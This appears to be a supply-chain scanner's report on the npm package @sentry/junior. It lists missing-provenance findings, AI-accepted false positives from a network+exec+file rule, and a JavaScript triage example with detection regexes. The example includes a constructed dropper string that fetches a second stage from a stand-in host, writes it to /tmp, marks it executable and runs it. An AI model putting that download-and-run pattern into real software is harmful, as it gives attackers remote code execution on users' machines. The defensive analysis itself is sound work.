@sentry/junior
`@sentry/junior` is a Slack bot package built on [Hono](https://hono.dev/).
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:dist/chunk-5UJSQX4R.js | AI (source-diff): Sample shows plugin discovery via fs APIs, not network+exec dropper pattern; stable false positive for this package. | ai | |
| source-diff | net-exec-file:dist/chunk-DPTR2FNH.js | AI (source-diff): Readable application code for an AI chat agent; network+exec pattern is legitimate for this package's purpose. | ai | |
| source-diff | net-exec-file:dist/chunk-RKOO42TW.js | AI (source-diff): File contains plugin discovery via fs APIs, not network+exec dropper pattern; stable false positive for this package. | ai | |
| source-diff | net-exec-file:dist/chunk-BKYYVLVN.js | AI (source-diff): Plugin registry/discovery code; legitimate filesystem scanning for AI agent framework, not dropper behavior. | ai | |
| source-diff | net-exec-file:dist/chunk-OZFXD5IG.js | AI (source-diff): Bundled chat-agent application code; network calls and dynamic execution are part of legitimate AI SDK usage, not malware. | ai | |
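The five accepted findings above all come from the same rule and were all dismissed for the same reason: a bundled chunk that contains an HTTP client, a plugin loader and a cache writer in one file looks, to a per-file co-occurrence rule, the same as a download-write-run dropper. The snippet below is an added example and not the scanner's actual rule or any code from `@sentry/junior`; it reimplements a minimal "network + exec + file" heuristic (pattern lists and scoring are assumptions) and runs it over two constructed sources, a plugin-discovery module and a dropper, to show why the first one fires and what a reviewer looks at to accept it.

```javascript
// Added example: minimal net-exec-file style heuristic (assumed pattern lists, not the
// scanner's rule) plus the ordering check a reviewer applies when triaging a hit.
// Only call sites are matched, so an import of child_process alone does not count as exec.
const SIGNALS = {
  net: [/\bfetch\s*\(/, /\bhttps?\.(get|request)\s*\(/, /\baxios\b/, /\bundici\b/],
  exec: [/\b(exec|execSync|spawn|spawnSync|execFile|execFileSync)\s*\(/, /\bnew Function\s*\(/, /\beval\s*\(/],
  file: [/\bwriteFile(Sync)?\s*\(/, /\bcreateWriteStream\s*\(/, /\bchmod(Sync)?\s*\(/],
  fsRead: [/\breaddir(Sync)?\s*\(/, /\breadFile(Sync)?\s*\(/, /\bstat(Sync)?\s*\(/],
};

// Which signal classes appear anywhere in the file.
function signalsIn(source) {
  const hit = {};
  for (const [name, patterns] of Object.entries(SIGNALS)) {
    hit[name] = patterns.some((re) => re.test(source));
  }
  return hit;
}

// The rule as a per-file co-occurrence test: network, exec and file-write together.
// This is what makes bundled application chunks fire; it never looks at data flow.
function netExecFile(source) {
  const s = signalsIn(source);
  return { fires: s.net && s.exec && s.file, signals: s };
}

// Reviewer's refinement: a dropper downloads, writes to disk, then executes, in that order.
// Position of the first call site of each class is a cheap stand-in for data flow.
function dropperOrdering(source) {
  const first = (patterns) =>
    Math.min(...patterns.map((re) => { const m = re.exec(source); return m ? m.index : Infinity; }));
  const n = first(SIGNALS.net), f = first(SIGNALS.file), e = first(SIGNALS.exec);
  return [n, f, e].every(Number.isFinite) && n < f && f < e;
}

// Constructed sample 1: plugin discovery via fs APIs, a linter runner and a webhook
// notification in one bundled file. Benign, but all three signal classes are present.
const pluginDiscovery = `
import { readdirSync, writeFileSync } from "node:fs";
import { execFile } from "node:child_process";
export async function loadPlugins(dir) {
  const found = readdirSync(dir).filter((f) => f.endsWith(".plugin.js"));
  writeFileSync(".plugin-cache.json", JSON.stringify(found));
  return Promise.all(found.map((f) => import(dir + "/" + f)));
}
export function runLinter(file) { execFile("eslint", [file], () => {}); }
export async function notify(url) { await fetch(url, { method: "POST" }); }
`;

// Constructed sample 2: the shape the rule is actually hunting for (fetch, write, run).
const dropper = `
const https = require("node:https"); const fs = require("node:fs"); const cp = require("node:child_process");
https.get("http://example.invalid/stage2", (res) => {
  const out = fs.createWriteStream("/tmp/.x"); res.pipe(out);
  out.on("finish", () => { fs.chmodSync("/tmp/.x", 0o755); cp.execFile("/tmp/.x", () => {}); });
});
`;

function triage(source) {
  const r = netExecFile(source);
  return { ...r, dropperOrdering: dropperOrdering(source) };
}

console.log("plugin discovery:", triage(pluginDiscovery)); // fires: true, dropperOrdering: false
console.log("dropper:", triage(dropper));                  // fires: true, dropperOrdering: true
```

Both samples trip the co-occurrence rule, which is the expected false-positive rate for a bundler output; only the second has the download-then-write-then-execute ordering, and only the first has the `fs` read calls the reviewer cited as the reason for accepting the finding. An accepted finding of this kind should be re-reviewed when the chunk hash changes, since the accept is tied to the file name, not to its content.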
v0.2.0
1 finding: Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.1.1
1 finding: Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.1.0
1 finding: Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.